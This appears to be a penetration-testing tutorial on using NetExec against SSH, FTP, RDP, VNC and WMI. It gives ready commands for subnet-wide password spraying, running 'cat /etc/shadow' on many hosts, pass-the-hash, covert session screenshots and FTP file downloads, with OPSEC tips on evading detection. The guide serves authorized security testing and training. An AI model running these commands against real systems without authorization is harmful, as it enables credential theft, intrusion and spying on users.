SSH / FTP / RDP / VNC / WMI Operations with NetExec
#Overview
Beyond SMB, LDAP, WinRM, and MSSQL, NetExec supports five additional protocols for credential validation and command execution. These protocols are essential for comprehensive internal pentesting coverage — especially in environments with mixed Linux/Windows infrastructure, network devices, and management interfaces.
#SSH (22/TCP)
SSH is the primary remote management protocol for Linux/Unix systems, network devices, and increasingly Windows Server (OpenSSH Server).
#Credential Validation
# Password authentication
netexec ssh 10.10.10.5 -u root -p 'password'
# [+] → valid credentials
# [-] → invalid
# Key-based authentication
netexec ssh 10.10.10.5 -u root -p /path/to/private_key --key
# Spray credentials across Linux hosts
netexec ssh 10.10.10.0/24 -u root -p passwords.txt --continue-on-success
# Non-standard port
netexec ssh 10.10.10.5 -u user -p pass --port 2222
BASH
#Command Execution
# Execute single command
netexec ssh 10.10.10.5 -u root -p pass -x 'id'
# Output: uid=0(root) gid=0(root) groups=0(root)
# Execute on multiple hosts
netexec ssh targets.txt -u root -p pass -x 'cat /etc/shadow'
# Sudo privilege check
netexec ssh 10.10.10.5 -u user -p pass -x 'sudo -l'
# Shows: which commands the user can run with sudo
BASH
#FTP (21/TCP)
FTP is common on legacy systems, network devices, and some web servers. It's often overlooked but can provide file access and credential validation.
#Credential Validation
# Standard FTP authentication
netexec ftp 10.10.10.5 -u anonymous -p ''
# [+] → valid credentials
# [-] → invalid
# Spray credentials
netexec ftp 10.10.10.5 -u users.txt -p passwords.txt --continue-on-success
# Non-standard port
netexec ftp 10.10.10.5 -u user -p pass --port 2121
BASH
#File Operations
# List files in root directory
netexec ftp 10.10.10.5 -u user -p pass -x 'LIST'
# Download a file
netexec ftp 10.10.10.5 -u user -p pass -x 'RETR backup.zip'
BASH
#RDP (3389/TCP)
Remote Desktop Protocol is the standard Windows GUI remote access protocol. NetExec can validate credentials and capture screenshots without establishing a full GUI session.
#Credential Validation
# Validate RDP credentials
netexec rdp 10.10.10.5 -u administrator -p pass
# [+] → valid credentials, RDP accessible
# [-] → invalid credentials or RDP disabled
# Check NLA (Network Level Authentication) status
netexec rdp 10.10.10.5 -u '' -p '' --nla-check
# NLA:True → requires authentication before RDP session
# NLA:False → potential for pre-auth attacks (rare on modern Windows)
# Spray credentials
netexec rdp 10.10.10.0/24 -u users.txt -p 'Summer2024!' --continue-on-success
BASH
#Screenshot Capture
# Capture screenshot of current RDP session
netexec rdp 10.10.10.5 -u user -p pass -M rdp_screenshot
# Output: PNG screenshot saved to workspace
# Useful for: seeing what the logged-on user is doing
# Screenshot with custom output directory
netexec rdp 10.10.10.5 -u user -p pass -M rdp_screenshot -o OUTPUT=/tmp/screenshots
BASH
#VNC (5900/TCP)
Virtual Network Computing is common on legacy systems, industrial control systems, and some Linux desktops. Often configured with weak or no passwords.
#Credential Validation
# Validate VNC credentials
netexec vnc 10.10.10.5 -u '' -p 'password'
# VNC typically uses password-only auth (no username)
# Spray VNC passwords
netexec vnc 10.10.10.0/24 -u '' -p passwords.txt --continue-on-success
# Screenshot capture
netexec vnc 10.10.10.5 -u '' -p pass -M vnc_screenshot
BASH
#WMI (135/TCP + dynamic ports)
Windows Management Instrumentation provides remote management capabilities. NetExec's WMI module validates credentials and executes commands via WMI.
#Credential Validation
# Validate WMI credentials
netexec wmi 10.10.10.5 -u administrator -p pass
# [+] → valid credentials with WMI access
# [-] → invalid or WMI blocked
# Domain context
netexec wmi 10.10.10.5 -u user -p pass -d domain.local
# Pass-the-hash
netexec wmi 10.10.10.5 -u administrator -H ':NTHASH'
BASH
#Command Execution
# Execute command via WMI
netexec wmi 10.10.10.5 -u admin -p pass -x 'whoami'
# WMI execution uses Win32_Process Create method
# Execute on multiple targets
netexec wmi targets.txt -u admin -p pass -x 'systeminfo'
BASH
#Multi-Protocol Workflow
Combine protocols for comprehensive coverage:
# Step 1: Validate credentials across all accessible protocols
netexec smb 10.10.10.0/24 -u users.txt -p 'Fall2024!' --continue-on-success
netexec winrm 10.10.10.0/24 -u users.txt -p 'Fall2024!' --continue-on-success
netexec ssh 10.10.10.0/24 -u users.txt -p 'Fall2024!' --continue-on-success
# Step 2: For valid SMB credentials, check WinRM access
netexec winrm 10.10.10.5 -u valid_user -p valid_pass
# Step 3: For Linux targets, check sudo privileges
netexec ssh 10.10.10.5 -u valid_user -p valid_pass -x 'sudo -l'
# Step 4: For RDP-accessible targets, capture screenshots
netexec rdp 10.10.10.5 -u valid_user -p valid_pass -M rdp_screenshot
BASH
#Common Pitfalls
- ⚠️ SSH rate limiting: Many Linux hosts use fail2ban or similar — too many failed SSH attempts will blacklist your IP. Use conservative spraying rates.
- ⚠️ FTP cleartext: All FTP traffic (including credentials) is unencrypted. Network IDS may flag FTP authentication attempts.
- ⚠️ RDP NLA: Modern Windows requires NLA by default. You cannot connect to the RDP session without valid credentials first.
- ⚠️ VNC password length: VNC passwords are truncated to 8 characters. A password longer than 8 chars only needs the first 8 chars to authenticate.
- ⚠️ WMI firewall: WMI requires RPC dynamic ports. If only 135/TCP is open, WMI will fail. Use SMB or WinRM as fallback.
#OPSEC Considerations
| Protocol | Noise Level | Key Artifacts |
|---|---|---|
| SSH | Low–Medium | SSH auth events, fail2ban logs |
| FTP | Low | FTP service logs (cleartext credentials visible) |
| RDP | Medium | Terminal Services session events, 4625/4624 login events |
| VNC | Low | VNC server logs (rarely monitored) |
| WMI | Medium | WMI activity logs, Win32_Process creation events |
#Post-Exploitation Value
- SSH access → full Linux/Unix remote control, file transfer, tunneling
- FTP access → file exfiltration, configuration discovery
- RDP access → GUI session, detailed Windows enumeration
- VNC access → GUI session, keystroke monitoring potential
- WMI access → Windows remote management, lateral movement
#Cross-References
- SMB Operations — Primary Windows protocol
- WinRM Operations — PowerShell remoting
- Password Spraying — Spraying across all protocols
- Pivoting & Tunneling — Using SSH for tunneling